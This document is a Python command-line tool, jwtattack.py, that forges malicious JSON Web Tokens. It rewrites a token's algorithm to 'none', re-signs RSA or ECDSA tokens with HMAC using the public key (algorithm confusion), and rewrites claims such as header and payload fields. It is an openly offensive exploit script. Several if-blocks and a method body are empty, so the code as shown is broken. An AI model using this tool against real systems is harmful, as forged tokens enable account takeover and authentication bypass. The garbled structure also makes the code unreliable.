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from argparse import ArgumentParser
from jwt import encode, decode, get_unverified_header
from logger import Logger
from sys import stdin
from pprint import pprint
VERSION = "1.0-20201203"
DESC = "This script creates malicious JSON Web Tokens"
class JwtAttack:
# Attack enums
NONE = 1
RSA = 2
def __init__(self, token=None, verbose=False, rheaders=None, rdata=None, attacks=[], rsa_key=None):
if attacks is None:
attacks = []
if token is None:
# Initializing the argument parsing
ap = ArgumentParser(description=DESC, prog="jwtattack.py")
ap.add_argument("-V", '--version', action='version', version='%(prog)s ' + VERSION)
ap.add_argument("-v", "--verbose", action="store_true", help="display verbose output")
ap.add_argument('token', help="the JWT to attack")
g_attacks = ap.add_argument_group("Attack options", "Select attack options to generate malicious tokens")
g_attacks.add_argument("-a", "--all", action="store_true", help="generate all possible malicious tokens")
g_attacks.add_argument("-n", "--none", action="store_true", help="generate token using 'none' algorithm")
g_attacks.add_argument("-r", "--rsa", action="store_true", help="generate token signed with the public key")
g_attacks.add_argument("PUBLIC_KEY", nargs="?", help="public key for the RSA attack (alternatively stdin)")
g_attacks.add_argument("-H", "--headers", nargs="+", help="Changes to apply to header, format key:value")
g_attacks.add_argument("-D", "--data", nargs="+", help="Changes to apply to data, format key:value")
# Loading options
args = ap.parse_args()
verbose = args.verbose
token = args.token
rheaders = [x.split(":") for x in args.headers] if args.headers else []
rdata = [x.split(":") for x in args.data] if args.data else []
if args.all or args.none:
if args.all or args.rsa:
rsa_key = args.PUBLIC_KEY
self.log = Logger(verbose)
self.token = token
self.headers = None
self.rheaders = rheaders
self.rdata = rdata
self.data = None
self.attacks = attacks
self.key = rsa_key
def replace(self, rheaders, rdata):
# Replace headers and data according to arguments
if rheaders:
self.log.information("Modifying headers according to arguments")
for header in rheaders:
self.headers[header[0]] = header[1]
self.log.information("Set header " + header[0] + " to " + header[1])
self.log.information("Headers = " + repr(self.headers))
if rdata:
self.log.information("Modifying data according to arguments")
for data in rdata:
self.data[data[0]] = data[1]
self.log.information("Set data " + data[0] + " to " + data[1])
self.log.information("Data = " + repr(self.data))
def attack_none(self):
# Rewrite and add empty signature
headers = self.headers.copy()
headers["alg"] = "none"
self.log.information("Modified headers = " + repr(headers))
return encode(self.data, None, algorithm="none", headers=headers)
def attack_rsa(self):
# Check if asymmetric signature is used
if self.headers["alg"] not in ["RS256", "RS384", "RS512", "ES256", "ES384", "ES512"]:
self.log.error("Algorithm " + self.headers["alg"] + " does not support RSA attack")
self.log.warning("Allowed algorithms are RS256, RS384, RS512, ES256, ES384, ES512")
self.log.information("Algorithm " + self.headers["alg"] + " supports RSA attack")
# Retrieve key
if self.key is None and not stdin.isatty():
key = stdin.read()
key = key.rstrip("\n")
self.log.information("Key from stdin = " + key)
self.log.error("No RSA public key provided!")
# Rewrite and sign symmetric
headers = self.headers.copy()
headers["alg"] = "HS" + self.headers["alg"][2:]
self.log.information("Modified headers = " + repr(headers))
return encode(self.data, key, algorithm=headers["alg"], headers=headers)
def pretty_print(self):
def attack(self):
# See https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
# Get headers and data from token
self.headers = get_unverified_header(self.token)
self.log.information("Headers = " + repr(self.headers))
self.data = decode(self.token, verify=False)
self.log.information("Data = " + repr(self.data))
self.replace(self.rheaders, self.rdata)
# Replacing signature with 'none' algorithm
if self.NONE in self.attacks:
self.log.information("Attacking using algorithm 'none'")
self.log.output("None: " + self.attack_none().decode("utf-8"))
# Trying to sign with a secret key using the RSA private key
if self.RSA in self.attacks:
self.log.information("Attacking using RSA signatures")
rsa = self.attack_rsa()
if rsa is not None:
self.log.output("RSA: " + rsa.decode("utf-8"))
# Pretty-print if no attack is chosen
if not self.attacks:
if self.headers["alg"] in ["HS256", "HS384", "HS512"]:
self.log.output("You could try brute-forcing the symmetric secret")
if __name__ == "__main__":
j = JwtAttack()